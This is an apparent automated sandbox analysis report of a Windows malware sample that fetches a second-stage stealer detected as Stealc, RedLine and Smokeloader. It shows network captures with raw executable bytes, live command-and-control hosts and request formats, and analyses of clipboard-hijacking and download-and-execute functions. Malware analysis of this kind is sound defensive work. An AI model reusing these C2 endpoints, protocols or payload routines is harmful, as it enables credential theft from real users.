Dec 11, 2024 00:02:03.610200882 CET	1236	IN	HTTP/1.1 200 OK Date: Tue, 10 Dec 2024 23:02:03 GMT Server: Apache/2.4.41 (Ubuntu) Last-Modified: Tue, 10 Dec 2024 23:00:02 GMT ETag: "4a800-628f270ec78e7" Accept-Ranges: bytes Content-Length: 305152 Content-Type: application/x-msdos-program Data Raw: 4d 5a 90 00 03 00 00 00 04 00 00 00 ff ff 00 00 b8 00 00 00 00 00 00 00 40 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 e8 00 00 00 0e 1f ba 0e 00 b4 09 cd 21 b8 01 4c cd 21 54 68 69 73 20 70 72 6f 67 72 61 6d 20 63 61 6e 6e 6f 74 20 62 65 20 72 75 6e 20 69 6e 20 44 4f 53 20 6d 6f 64 65 2e 0d 0d 0a 24 00 00 00 00 00 00 00 d9 21 4a f4 9d 40 24 a7 9d 40 24 a7 9d 40 24 a7 83 12 a0 a7 81 40 24 a7 83 12 b1 a7 89 40 24 a7 83 12 a7 a7 c5 40 24 a7 ba 86 5f a7 94 40 24 a7 9d 40 25 a7 f7 40 24 a7 83 12 ae a7 9c 40 24 a7 83 12 b0 a7 9c 40 24 a7 83 12 b5 a7 9c 40 24 a7 52 69 63 68 9d 40 24 a7 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 50 45 00 00 4c 01 04 00 25 df 7d 65 00 00 00 00 00 00 00 00 e0 00 03 01 0b 01 09 00 00 f2 02 00 00 24 3f 00 00 00 00 00 f7 14 00 00 00 10 00 00 00 10 03 00 00 00 40 00 00 10 00 00 00 02 00 00 05 00 00 00 00 00 00 00 05 00 00 00 00 00 00 00 00 30 42 00 00 04 00 00 e1 2d 05 00 02 00 00 81 00 00 10 00 00 10 00 00 00 00 [TRUNCATED] Data Ascii: MZ@!L!This program cannot be run in DOS mode.$!J@$@$@$@$@$@$_@$@%@$@$@$@$Rich@$PEL%}e$?@0B-'PA"h.text `.rdataL "@@.data=@l@.rsrc"A$@@
Dec 11, 2024 00:02:03.610224009 CET	1236	IN	Data Raw: 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 ff 25 60 10 43 00 3b 0d 04 40 43 00 75 02 f3 c3 e9 ec 04 00 00 6a 0c 68 40 25 43 00 e8 df 12 00 00 8b 75 08 85 f6 74 75 83 3d Data Ascii: %`C;@Cujh@%Cutu=uCjYeVYEtVPYYE}u7ujYVj5jCCuCPmYUQeVEPuu/u9Et
Dec 11, 2024 00:02:03.610234022 CET	448	IN	Data Raw: 4d dc 50 51 e8 f9 20 00 00 59 59 c3 8b 65 e8 8b 45 dc 89 45 e0 83 7d e4 00 75 06 50 e8 f3 13 00 00 e8 13 14 00 00 c7 45 fc fe ff ff ff 8b 45 e0 eb 13 33 c0 40 c3 8b 65 e8 c7 45 fc fe ff ff ff b8 ff 00 00 00 e8 4f 0e 00 00 c3 e8 7b 29 00 00 e9 78 Data Ascii: MPQ YYeEE}uPEE3@eEO{)xU(xhCthCphClhC5hhC=dhCfhCfhCf`hCf\hCf%XhCf-ThChCE\|hCEhCEhCgChC\|gCpgCt
Dec 11, 2024 00:02:03.610325098 CET	1236	IN	Data Raw: 00 10 00 00 50 ff 15 c0 10 43 00 a3 94 6a 43 00 85 c0 75 02 5d c3 33 c0 40 a3 d0 a0 80 00 5d c3 8b ff 56 57 33 f6 bf 98 6a 43 00 83 3c f5 8c 41 43 00 01 75 1e 8d 04 f5 88 41 43 00 89 38 68 a0 0f 00 00 ff 30 83 c7 18 e8 c8 29 00 00 59 59 85 c0 74 Data Ascii: PCjCu]3@]VW3jC<ACuAC8h0)YYtF$\|3@_^$AC3SCVACW>t~tWW&YBC\|AC_t~uPBC\|^[UE4ACC]jh%C3G}39jC
Dec 11, 2024 00:02:03.610337019 CET	1236	IN	Data Raw: ec 51 8d 48 14 51 50 e8 a4 25 00 00 8b 45 08 83 c4 0c ff 0d b8 a0 80 00 3b 05 e8 6b 43 00 76 04 83 6d 08 14 a1 bc a0 80 00 a3 c4 a0 80 00 8b 45 08 a3 e8 6b 43 00 89 3d cc a0 80 00 5b 5f 5e c9 c3 a1 c8 a0 80 00 56 8b 35 b8 a0 80 00 57 33 ff 3b f0 Data Ascii: QHQP%E;kCvmEkC=[_^V5W3;u4kP5W5jCC;u3x5k5hAj5jCCF;tjh hWCF;uvW5jCCN>~F_^
Dec 11, 2024 00:02:03.610358000 CET	1236	IN	Data Raw: 40 5f 5e 5b c9 c3 8b ff 55 8b ec 83 ec 14 a1 b8 a0 80 00 8b 4d 08 6b c0 14 03 05 bc a0 80 00 83 c1 17 83 e1 f0 89 4d f0 c1 f9 04 53 49 83 f9 20 56 57 7d 0b 83 ce ff d3 ee 83 4d f8 ff eb 0d 83 c1 e0 83 ca ff 33 f6 d3 ea 89 55 f8 8b 0d c4 a0 80 00 Data Ascii: @_^[UMkMSI VW}M3US;#U#u];r;uS;#U#u];r;u[{u];r;u1{u];r;u]u3S:YKC8t
Dec 11, 2024 00:02:03.610363960 CET	1236	IN	Data Raw: 1c ff ff ff 6a 0c 68 e8 25 43 00 e8 08 fe ff ff 8b 4d 08 33 ff 3b cf 76 2e 6a e0 58 33 d2 f7 f1 3b 45 0c 1b c0 40 75 1f e8 34 f1 ff ff c7 00 0c 00 00 00 57 57 57 57 57 e8 27 1b 00 00 83 c4 14 33 c0 e9 d5 00 00 00 0f af 4d 0c 8b f1 89 75 08 3b f7 Data Ascii: jh%CM3;v.jX3;E@u4WWWWW'3Mu;u3F3]wi=uKuE;w7jY}uYEE_];tuWSf!;uaVj5jCC;uL9=8oCt3VqYrE;P
Dec 11, 2024 00:02:03.610732079 CET	1236	IN	Data Raw: 00 83 c4 0c 85 c0 74 0d 56 56 56 56 56 e8 56 15 00 00 83 c4 14 68 04 01 00 00 be 39 6c 43 00 56 6a 00 c6 05 3d 6d 43 00 00 ff 15 ec 10 43 00 85 c0 75 26 68 60 17 43 00 68 fb 02 00 00 56 e8 3c 23 00 00 83 c4 0c 85 c0 74 0f 33 c0 50 50 50 50 50 e8 Data Ascii: tVVVVVVh9lCVj=mCCu&h`ChV<#t3PPPPPV"@Y<v8V";j4oCh\C+QP!t3VVVVV3hXCSW!tVVVVVE4BCSW tVVVVVh h0CWd
Dec 11, 2024 00:02:03.610743999 CET	1120	IN	Data Raw: 85 c0 74 07 50 e8 7b e1 ff ff 59 8b 46 44 85 c0 74 07 50 e8 6d e1 ff ff 59 8b 46 48 85 c0 74 07 50 e8 5f e1 ff ff 59 8b 46 5c 3d 00 18 43 00 74 07 50 e8 4e e1 ff ff 59 6a 0d e8 39 e9 ff ff 59 83 65 fc 00 8b 7e 68 85 ff 74 1a 57 ff 15 14 10 43 00 Data Ascii: tP{YFDtPmYFHtP_YF\=CtPNYj9Ye~htWCuDCtW!YEWjYE~lt#W Y;=DCtDCt?uWYEVYujYujYVWCV(CuV
Dec 11, 2024 00:02:03.610754967 CET	1236	IN	Data Raw: eb 0a 8b 08 89 0e 8b 40 04 89 46 04 8b c6 5e 5d c2 04 00 8b ff 55 8b ec 83 ec 14 56 57 ff 75 08 8d 4d ec e8 64 ff ff ff 8b 45 10 8b 75 0c 33 ff 3b c7 74 02 89 30 3b f7 75 2c e8 1a e3 ff ff 57 57 57 57 57 c7 00 16 00 00 00 e8 0d 0d 00 00 83 c4 14 Data Ascii: @F^]UVWuMdEu3;t0;u,WWWWW}tE`p39}t}\|}$MS}~~EPjP&MBtG-uM+uGEKB$9u*0
Dec 11, 2024 00:02:03.729743958 CET	1236	IN	Data Raw: 53 eb 42 56 e8 e3 14 00 00 8b d8 43 80 3e 3d 59 74 31 6a 01 53 e8 61 f9 ff ff 59 59 89 07 85 c0 74 4e 56 53 50 e8 4d 15 00 00 83 c4 0c 85 c0 74 0f 33 c0 50 50 50 50 50 e8 23 07 00 00 83 c4 14 83 c7 04 03 f3 80 3e 00 75 b9 ff 35 60 67 43 00 e8 fc Data Ascii: SBVC>=Yt1jSaYYtNVSPMt3PPPPP#>u5`gC%`gC'3Y[_^5kC%kCUQMS3VU9Et]EE>"u39E"FE<tBUPFS#Yt}tM

Session ID	Source IP	Source Port	Destination IP	Destination Port	PID	Process
1	192.168.2.4	49738	92.255.57.89	80	7928	C:\Users\user\AppData\Local\Temp\BB02.tmp.exe

Timestamp	Bytes transferred	Direction	Data
Dec 11, 2024 00:02:07.099173069 CET	87	OUT	GET / HTTP/1.1 Host: 92.255.57.89 Connection: Keep-Alive Cache-Control: no-cache
Dec 11, 2024 00:02:08.421931028 CET	203	IN	HTTP/1.1 200 OK Date: Tue, 10 Dec 2024 23:02:08 GMT Server: Apache/2.4.58 (Ubuntu) Content-Length: 0 Keep-Alive: timeout=5, max=100 Connection: Keep-Alive Content-Type: text/html; charset=UTF-8
Dec 11, 2024 00:02:08.425407887 CET	412	OUT	POST /45c616e921a794b8.php HTTP/1.1 Content-Type: multipart/form-data; boundary=----ECGDHDHJEBGHJKFIECBG Host: 92.255.57.89 Content-Length: 213 Connection: Keep-Alive Cache-Control: no-cache Data Raw: 2d 2d 2d 2d 2d 2d 45 43 47 44 48 44 48 4a 45 42 47 48 4a 4b 46 49 45 43 42 47 0d 0a 43 6f 6e 74 65 6e 74 2d 44 69 73 70 6f 73 69 74 69 6f 6e 3a 20 66 6f 72 6d 2d 64 61 74 61 3b 20 6e 61 6d 65 3d 22 68 77 69 64 22 0d 0a 0d 0a 31 39 35 39 41 43 33 44 43 38 34 45 37 35 38 38 30 39 30 31 34 0d 0a 2d 2d 2d 2d 2d 2d 45 43 47 44 48 44 48 4a 45 42 47 48 4a 4b 46 49 45 43 42 47 0d 0a 43 6f 6e 74 65 6e 74 2d 44 69 73 70 6f 73 69 74 69 6f 6e 3a 20 66 6f 72 6d 2d 64 61 74 61 3b 20 6e 61 6d 65 3d 22 62 75 69 6c 64 22 0d 0a 0d 0a 64 65 66 61 75 6c 74 0d 0a 2d 2d 2d 2d 2d 2d 45 43 47 44 48 44 48 4a 45 42 47 48 4a 4b 46 49 45 43 42 47 2d 2d 0d 0a Data Ascii: ------ECGDHDHJEBGHJKFIECBGContent-Disposition: form-data; name="hwid"1959AC3DC84E758809014------ECGDHDHJEBGHJKFIECBGContent-Disposition: form-data; name="build"default------ECGDHDHJEBGHJKFIECBG--
Dec 11, 2024 00:02:08.868931055 CET	210	IN	HTTP/1.1 200 OK Date: Tue, 10 Dec 2024 23:02:08 GMT Server: Apache/2.4.58 (Ubuntu) Content-Length: 8 Keep-Alive: timeout=5, max=99 Connection: Keep-Alive Content-Type: text/html; charset=UTF-8 Data Raw: 59 6d 78 76 59 32 73 3d Data Ascii: YmxvY2s=

HTTPS Proxied Packets

Session ID	Source IP	Source Port	Destination IP	Destination Port	PID	Process
0	192.168.2.4	49735	172.67.179.207	443	7784	C:\Users\user\Desktop\EbXj93v3bO.exe

Timestamp	Bytes transferred	Direction	Data
2024-12-10 23:02:01 UTC	90	OUT	GET /track_prt.php?sub=0&cc=DE HTTP/1.1 User-Agent: ShareScreen Host: post-to-me.com
2024-12-10 23:02:02 UTC	805	IN	HTTP/1.1 200 OK Date: Tue, 10 Dec 2024 23:02:01 GMT Content-Type: text/html Transfer-Encoding: chunked Connection: close X-Powered-By: PHP/5.4.16 CF-Cache-Status: DYNAMIC Report-To: {"endpoints":[{"url":"https:\/\/a.nel.cloudflare.com\/report\/v4?s=GjewQryUMhrJ%2BmO4XsicaxXszxgCCo2UQNLR3jgGXHnkaiTncEP7xqdQTbbrXssrnYkYF4tJjlbDo%2FoIWs8n34u%2FLr%2F7m7I2xGCAvEyUTVl%2BJchJzOS48e1u5YbO9bpNrA%3D%3D"}],"group":"cf-nel","max_age":604800} NEL: {"success_fraction":0,"report_to":"cf-nel","max_age":604800} Server: cloudflare CF-RAY: 8f00dc342dca7c9a-EWR alt-svc: h3=":443"; ma=86400 server-timing: cfL4;desc="?proto=TCP&rtt=4168&min_rtt=2013&rtt_var=2245&sent=6&recv=7&lost=0&retrans=0&sent_bytes=2833&recv_bytes=728&delivery_rate=1450571&cwnd=188&unsent_bytes=0&cid=739b0e43e4b1fe84&ts=675&x=0"
2024-12-10 23:02:02 UTC	7	IN	Data Raw: 32 0d 0a 6f 6b 0d 0a Data Ascii: 2ok
2024-12-10 23:02:02 UTC	5	IN	Data Raw: 30 0d 0a 0d 0a Data Ascii: 0

Target ID:	0
Start time:	18:01:56
Start date:	10/12/2024
Path:	C:\Users\user\Desktop\EbXj93v3bO.exe
Wow64 process (32bit):	true
Commandline:	"C:\Users\user\Desktop\EbXj93v3bO.exe"
Imagebase:	0x400000
File size:	430'592 bytes
MD5 hash:	C3108CEFDF629F631DBBA54AF7124ABC
Has elevated privileges:	true
Has administrator privileges:	true
Programmed in:	C, C++ or other language
Yara matches:	Rule: Windows_Trojan_RedLineStealer_ed346e4c, Description: unknown, Source: 00000000.00000002.4104016383.0000000000B3E000.00000040.00000020.00020000.00000000.sdmp, Author: unknown Rule: Windows_Trojan_Smokeloader_3687686f, Description: unknown, Source: 00000000.00000002.4104248439.0000000002510000.00000040.00001000.00020000.00000000.sdmp, Author: unknown
Reputation:	low
Has exited:	false

Show Windows behavior

Target ID:	1
Start time:	18:02:03
Start date:	10/12/2024
Path:	C:\Users\user\AppData\Local\Temp\BB02.tmp.exe
Wow64 process (32bit):	true
Commandline:	"C:\Users\user\AppData\Local\Temp\BB02.tmp.exe"
Imagebase:	0x400000
File size:	305'152 bytes
MD5 hash:	3E5FC816D18B06CEFCB86A31AE9FE52E
Has elevated privileges:	true
Has administrator privileges:	true
Programmed in:	C, C++ or other language
Yara matches:	Rule: JoeSecurity_Stealc, Description: Yara detected Stealc, Source: 00000001.00000002.2070739085.0000000000596000.00000040.00000001.01000000.00000006.sdmp, Author: Joe Security Rule: JoeSecurity_Stealc, Description: Yara detected Stealc, Source: 00000001.00000002.2070739085.0000000000540000.00000040.00000001.01000000.00000006.sdmp, Author: Joe Security Rule: JoeSecurity_Stealc, Description: Yara detected Stealc, Source: 00000001.00000002.2070739085.0000000000400000.00000040.00000001.01000000.00000006.sdmp, Author: Joe Security Rule: JoeSecurity_Stealc, Description: Yara detected Stealc, Source: 00000001.00000003.1744504522.0000000002520000.00000004.00001000.00020000.00000000.sdmp, Author: Joe Security Rule: JoeSecurity_Stealc, Description: Yara detected Stealc, Source: 00000001.00000002.2071410267.0000000000A3B000.00000004.00000020.00020000.00000000.sdmp, Author: Joe Security Rule: Windows_Trojan_RedLineStealer_ed346e4c, Description: unknown, Source: 00000001.00000002.2071390992.0000000000A1C000.00000040.00000020.00020000.00000000.sdmp, Author: unknown Rule: JoeSecurity_Stealc, Description: Yara detected Stealc, Source: 00000001.00000002.2070739085.000000000055B000.00000040.00000001.01000000.00000006.sdmp, Author: Joe Security Rule: JoeSecurity_Stealc, Description: Yara detected Stealc, Source: 00000001.00000002.2071531089.00000000024E0000.00000040.00001000.00020000.00000000.sdmp, Author: Joe Security Rule: Windows_Trojan_Smokeloader_3687686f, Description: unknown, Source: 00000001.00000002.2071531089.00000000024E0000.00000040.00001000.00020000.00000000.sdmp, Author: unknown Rule: JoeSecurity_Stealc, Description: Yara detected Stealc, Source: 00000001.00000002.2070739085.000000000044B000.00000040.00000001.01000000.00000006.sdmp, Author: Joe Security
Antivirus matches:	Detection: 100%, Joe Sandbox ML
Reputation:	low
Has exited:	true

Show Windows behavior

Target ID:	6
Start time:	18:02:33
Start date:	10/12/2024
Path:	C:\Windows\SysWOW64\WerFault.exe
Wow64 process (32bit):	true
Commandline:	C:\Windows\SysWOW64\WerFault.exe -u -p 7928 -s 1292
Imagebase:	0x7e0000
File size:	483'680 bytes
MD5 hash:	C31336C1EFC2CCB44B4326EA793040F2
Has elevated privileges:	true
Has administrator privileges:	true
Programmed in:	C, C++ or other language
Reputation:	high
Has exited:	true

Show Windows behavior

Execution Graph

Execution Coverage:	2.3%
Dynamic/Decrypted Code Coverage:	3.8%
Signature Coverage:	5.8%
Total number of Nodes:	741
Total number of Limit Nodes:	20

Executed Functions

Function 004016DF Relevance: 29.9, APIs: 16, Strings: 1, Instructions: 150
clipboardsleepmemoryCOMMON

Download Yara Rule

Control-flow Graph

Executed
Not Executed

APIs

__EH_prolog3_GS.LIBCMT ref: 004016E6
Sleep.KERNEL32(00001541,0000004C), ref: 004016F0

Part of subcall function 0040CC10: _strlen.LIBCMT ref: 0040CC27

OpenClipboard.USER32(00000000), ref: 0040171D
GetClipboardData.USER32(00000001), ref: 0040172D
GlobalLock.KERNEL32(00000000), ref: 0040173C
_strlen.LIBCMT ref: 00401749
_strlen.LIBCMT ref: 00401778
_strlen.LIBCMT ref: 004018BC
EmptyClipboard.USER32 ref: 004018D2
GlobalAlloc.KERNEL32(00000002,00000001,?,?,?,?,?,?,?,?,?,?,?,00000000,00000000), ref: 004018DF
GlobalLock.KERNEL32(00000000), ref: 004018FD
GlobalUnlock.KERNEL32(00000000), ref: 00401909
SetClipboardData.USER32(00000001,00000000), ref: 00401912
GlobalFree.KERNEL32(00000000), ref: 00401919
CloseClipboard.USER32 ref: 0040193D
Sleep.KERNEL32(000002D2), ref: 00401948

Strings

i, xrefs: 00401759

Memory Dump Source

Source File: 00000000.00000002.4103720960.0000000000400000.00000040.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_400000_EbXj93v3bO.jbxd

Similarity

API ID: ClipboardGlobal$_strlen$DataLockSleep$AllocCloseEmptyFreeH_prolog3_OpenUnlock
String ID: i
API String ID: 1583243082-3865851505
Opcode ID: 3890b0babb8c445354b39205077755c2ed8c63edb095b033559c6878a2d81ccf
Instruction ID: e3fffec023ebc7079252f179b6fac15abd8ab57f1bda789313b6278f228a63c7
Opcode Fuzzy Hash: 3890b0babb8c445354b39205077755c2ed8c63edb095b033559c6878a2d81ccf
Instruction Fuzzy Hash: 26510531C00384DAE7119B64EC567AD7774FF29306F04523AE805721B3EB789A85C75D

Function 004029F4 Relevance: 28.1, APIs: 13, Strings: 3, Instructions: 134
networkfilesynchronizationCOMMON

Download Yara Rule

Control-flow Graph

Executed
Not Executed

APIs

InternetOpenW.WININET(ShareScreen,00000000,00000000,00000000,00000000), ref: 00402A17
InternetOpenUrlW.WININET(00000000,0045D820,00000000,00000000,00000000,00000000), ref: 00402A2D
GetTempPathW.KERNEL32(00000105,?), ref: 00402A49
GetTempFileNameW.KERNEL32(?,00000000,00000000,?), ref: 00402A5F
CreateFileW.KERNEL32(?,40000000,00000000,00000000,00000002,00000080,00000000), ref: 00402A98
InternetReadFile.WININET(00000000,?,00000400,00000000), ref: 00402AD4
WriteFile.KERNEL32(00000000,?,00000000,?,00000000), ref: 00402AF1
CloseHandle.KERNEL32(00000000), ref: 00402B07
ShellExecuteExW.SHELL32(?), ref: 00402B68
WaitForSingleObject.KERNEL32(?,00008000), ref: 00402B7D
CloseHandle.KERNEL32(?), ref: 00402B89
InternetCloseHandle.WININET(00000000), ref: 00402B92
InternetCloseHandle.WININET(00000000), ref: 00402B95

Strings

ShareScreen, xrefs: 00402A12
.exe, xrefs: 00402A6B
<, xrefs: 00402B45

Memory Dump Source

Source File: 00000000.00000002.4103720960.0000000000400000.00000040.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_400000_EbXj93v3bO.jbxd

Similarity

API ID: Internet$CloseFileHandle$OpenTemp$CreateExecuteNameObjectPathReadShellSingleWaitWrite
String ID: .exe$<$ShareScreen
API String ID: 3323492106-493228180
Opcode ID: f58ca3bd5773c85defe3f015c49e34db42d2945e511aafa3139439615266b492
Instruction ID: e60cee4ce2238679e1fb1751da2f8ba8583e6b9327599976f3985bfb1b161874
Opcode Fuzzy Hash: f58ca3bd5773c85defe3f015c49e34db42d2945e511aafa3139439615266b492
Instruction Fuzzy Hash: 4741437190021CAFEB209F649D85FEAB7BCFF05745F0081F6A549E2190DEB49E858FA4

Function 00B3EC36 Relevance: 3.0, APIs: 2, Instructions: 41processCOMMON

Download Yara Rule

APIs

CreateToolhelp32Snapshot.KERNEL32(00000008,00000000), ref: 00B3EC5E
Module32First.KERNEL32(00000000,00000224), ref: 00B3EC7E

Memory Dump Source

Source File: 00000000.00000002.4104016383.0000000000B3E000.00000040.00000020.00020000.00000000.sdmp, Offset: 00B3E000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_b3e000_EbXj93v3bO.jbxd

Yara matches

Similarity

API ID: CreateFirstModule32SnapshotToolhelp32
String ID:
API String ID: 3833638111-0
Opcode ID: 3788706d20f5b898e185810e19a2e38a50b9b544ac306a9cd33eedd6d527d18a
Instruction ID: 5275ed3d4fac6aa43fb5ea728ca25ed3b3306db80b7dea6410377de7936e45a6
Opcode Fuzzy Hash: 3788706d20f5b898e185810e19a2e38a50b9b544ac306a9cd33eedd6d527d18a
Instruction Fuzzy Hash: BDF0F635100714AFD7203BF9A88CB6E76E8EF48320F60116AE652910C0CB70EC058661

Function 0043D03C Relevance: 17.8, APIs: 9, Strings: 1, Instructions: 272
COMMONLIBRARYCODE

Download Yara Rule

Control-flow Graph

Executed
Not Executed

APIs

Part of subcall function 0043CD0A: CreateFileW.KERNEL32(00000000,00000000,?,0043D0E5,?,?,00000000,?,0043D0E5,00000000,0000000C), ref: 0043CD27

GetLastError.KERNEL32 ref: 0043D150
__dosmaperr.LIBCMT ref: 0043D157
GetFileType.KERNEL32(00000000), ref: 0043D163
GetLastError.KERNEL32 ref: 0043D16D
__dosmaperr.LIBCMT ref: 0043D176
CloseHandle.KERNEL32(00000000), ref: 0043D196
CloseHandle.KERNEL32(?), ref: 0043D2E0
GetLastError.KERNEL32 ref: 0043D312
__dosmaperr.LIBCMT ref: 0043D319

Strings

H, xrefs: 0043D29E

Memory Dump Source

Source File: 00000000.00000002.4103720960.0000000000400000.00000040.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_400000_EbXj93v3bO.jbxd

Similarity

API ID: ErrorLast__dosmaperr$CloseFileHandle$CreateType
String ID: H
API String ID: 4237864984-2852464175
Opcode ID: 333ff1eee16b6be64793bd318ad3fa05ede6171504cd334b681c7e0d8fb5623c
Instruction ID: 375b4e16163f674ce9da34a4ad13212d62ba31a6b33a52f993f1a67b08af40b6
Opcode Fuzzy Hash: 333ff1eee16b6be64793bd318ad3fa05ede6171504cd334b681c7e0d8fb5623c
Instruction Fuzzy Hash: ACA13632E101149FCF19AF68EC517AE7BA1AF0A324F14115EF8159B391D6389D02CB5A

Function 00432F29 Relevance: 13.8, APIs: 9, Instructions: 300
COMMONLIBRARYCODE

Download Yara Rule

Control-flow Graph

Executed
Not Executed

Memory Dump Source

Source File: 00000000.00000002.4103720960.0000000000400000.00000040.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_400000_EbXj93v3bO.jbxd

Similarity

API ID:
String ID:
API String ID:
Opcode ID: bf5b903c5d4d7d43f3395e6d2b0615cff82c67b54ffa341e922cfa30cc62cd86
Instruction ID: e6f917e7e92ba8bfc6e6230e9bcbcb6957f35208d34794f9861c257e27c575d5
Opcode Fuzzy Hash: bf5b903c5d4d7d43f3395e6d2b0615cff82c67b54ffa341e922cfa30cc62cd86
Instruction Fuzzy Hash: 44C11670E04345AFDF11DFAAD841BAEBBB0BF0D305F14119AE815A7392C7389A41CB69

Function 0251003C Relevance: 12.8, APIs: 5, Strings: 2, Instructions: 515
memoryCOMMON

Download Yara Rule

Control-flow Graph

Executed
Not Executed

APIs

VirtualAlloc.KERNEL32(00000000,?,00001000,00000004), ref: 0251024D

Strings

kernel32.dll, xrefs: 0251008F, 02510095
cess, xrefs: 0251018D

Memory Dump Source

Source File: 00000000.00000002.4104248439.0000000002510000.00000040.00001000.00020000.00000000.sdmp, Offset: 02510000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_2510000_EbXj93v3bO.jbxd

Yara matches

Similarity

API ID: AllocVirtual
String ID: cess$kernel32.dll
API String ID: 4275171209-1230238691
Opcode ID: aaa6c488ea091c11cf1d14b1b8159415dd1a008d9b857f0942c425a8c5fa1e0a
Instruction ID: 6a3502ff98b3304039e9a356dd60c4d9ce73bb8427eb1be7f6948ec78f04b9f9
Opcode Fuzzy Hash: aaa6c488ea091c11cf1d14b1b8159415dd1a008d9b857f0942c425a8c5fa1e0a
Instruction Fuzzy Hash: DB525874A01229DFDB64CF58C984BA8BBB1BF09314F1480D9E94DAB391DB30AE85CF14

Function 00402C04 Relevance: 12.4, APIs: 4, Strings: 3, Instructions: 180
networkCOMMON

Download Yara Rule

Control-flow Graph

Executed
Not Executed

APIs

InternetOpenW.WININET(ShareScreen,00000000,00000000,00000000,00000000), ref: 00402C27

Part of subcall function 004010BA: _wcslen.LIBCMT ref: 004010C1
Part of subcall function 004010BA: _wcslen.LIBCMT ref: 004010DD

InternetOpenUrlW.WININET(00000000,?,00000000,00000000,00000000,00000000), ref: 00402E3A
InternetCloseHandle.WININET(00000000), ref: 00402E4B
InternetCloseHandle.WININET(00000000), ref: 00402E4E

Strings

&cc=DE, xrefs: 00402DB4, 00402DBA, 00402E17
ShareScreen, xrefs: 00402C22
https://post-to-me.com/track_prt.php?sub=, xrefs: 00402C57, 00402D83, 00402DF2

Memory Dump Source

Source File: 00000000.00000002.4103720960.0000000000400000.00000040.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_400000_EbXj93v3bO.jbxd

Similarity

API ID: Internet$CloseHandleOpen_wcslen
String ID: &cc=DE$ShareScreen$https://post-to-me.com/track_prt.php?sub=
API String ID: 3067768807-1501832161
Opcode ID: 89be1508a3bc8005e5e9602c7d60be0ea7129d63634688ee67e7a2662fb1427b
Instruction ID: 610146e9b537463af15e95cb977131b409bd75c1d6f6ac837d2bfbf99fd09ca4
Opcode Fuzzy Hash: 89be1508a3bc8005e5e9602c7d60be0ea7129d63634688ee67e7a2662fb1427b
Instruction Fuzzy Hash: 95515295E65344A9E320EFB0BC46B762378EF58712F10643BE518CB2F2E7B09944875E

Function 004051D0 Relevance: 9.1, APIs: 6, Instructions: 82
COMMON

Download Yara Rule

Control-flow Graph

Executed
Not Executed

APIs

__Cnd_init.LIBCPMT ref: 004051E4
__Mtx_init.LIBCPMT ref: 0040520A
std::_Cnd_initX.LIBCPMT ref: 0040522D
__Thrd_start.LIBCPMT ref: 00405252
std::_Cnd_waitX.LIBCPMT ref: 00405272
std::_Cnd_initX.LIBCPMT ref: 0040529F

Memory Dump Source

Source File: 00000000.00000002.4103720960.0000000000400000.00000040.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_400000_EbXj93v3bO.jbxd

Similarity

API ID: Cnd_initstd::_$Cnd_waitMtx_initThrd_start
String ID:
API String ID: 1687354797-0
Opcode ID: a291ca2b74a2a079234bae36187643b4709f220aeabf3b9fcc979ead6e8bbad4
Instruction ID: 19e1887bebf86d68050debe7f629b0077f83fb22891cd3fd40adaf63da529dec
Opcode Fuzzy Hash: a291ca2b74a2a079234bae36187643b4709f220aeabf3b9fcc979ead6e8bbad4
Instruction Fuzzy Hash: A2214F72C042089ADF15EBE9D845BDEB7F8AF08318F14407FE544B72C2DB7C99448AA9

Function 00405800 Relevance: 6.0, APIs: 4, Instructions: 29
COMMON

Download Yara Rule

Control-flow Graph

Executed
Not Executed

APIs

std::_Cnd_initX.LIBCPMT ref: 0040581C
__Cnd_signal.LIBCPMT ref: 00405828
std::_Cnd_initX.LIBCPMT ref: 0040583D
__Cnd_do_broadcast_at_thread_exit.LIBCPMT ref: 00405844

Memory Dump Source

Source File: 00000000.00000002.4103720960.0000000000400000.00000040.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_400000_EbXj93v3bO.jbxd

Similarity

API ID: Cnd_initstd::_$Cnd_do_broadcast_at_thread_exitCnd_signal
String ID:
API String ID: 2059591211-0
Opcode ID: 75d2ec5a84d6058dd22c20c78519f5ebb85b54958e4003f0e2117dcdaee44c85
Instruction ID: 35483bd65d518524af9bc0c336ffe1903f30c86e9e3fc9c48514fd729a934722
Opcode Fuzzy Hash: 75d2ec5a84d6058dd22c20c78519f5ebb85b54958e4003f0e2117dcdaee44c85
Instruction Fuzzy Hash: 6BF082324007009BE7317762C807B1A77A0AF0031DF10883FF496B69E2CFBDA8544A9D

Function 0042DFC0 Relevance: 5.3, APIs: 2, Strings: 1, Instructions: 38
threadCOMMON

Download Yara Rule

Control-flow Graph

Executed
Not Executed

APIs

GetLastError.KERNEL32(00457910,00000010,00000003,00431F5D), ref: 0042DFD3
ExitThread.KERNEL32 ref: 0042DFDA

Strings

F(@, xrefs: 0042DFCC, 0040F1E7

Memory Dump Source

Source File: 00000000.00000002.4103720960.0000000000400000.00000040.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_400000_EbXj93v3bO.jbxd

Similarity

API ID: ErrorExitLastThread
String ID: F(@
API String ID: 1611280651-2698495834
Opcode ID: 05a6bf9322938420f326034e00ba90610ba59fb7b5f4eb19846d64da3dd64c95
Instruction ID: 20c869b795d3320417ca4c19bdea27327a86df913c4cc91a2df8cdb03a1abfe5
